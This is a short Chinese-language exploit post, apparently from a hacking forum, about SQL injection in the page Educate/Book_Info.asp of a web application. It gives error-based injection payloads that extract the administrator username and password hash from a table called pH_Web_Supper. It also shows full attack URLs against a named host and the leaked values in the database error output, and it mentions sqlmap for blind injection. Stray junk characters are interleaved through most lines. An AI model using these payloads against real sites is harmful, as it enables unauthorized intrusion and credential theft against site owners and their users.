漏洞出现在Educate/Book_Info.asp
6 F% x3 I; l- v% U此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
; \- S D) Z' Y( gexp:如下
. q/ N' G' P* o9 r查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 v5 H' w$ a7 d( f& W* L
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
- [. P& s" W& V; j" p* Xhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)/ j* n1 p1 h" p$ d
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'6 ?4 N- ^, o. A- S# C
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。+ t* @' d% }$ I
/Educate/Book_Info.asp,行 8
! _9 m& H$ X y) Whttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
( ^6 L2 T3 @" M( c8 v* z1 FMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'1 x* I& Y* N: ?/ w
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
) L/ O2 @+ F5 b) d3 y8 q( F L/Educate/Book_Info.asp,行 8 |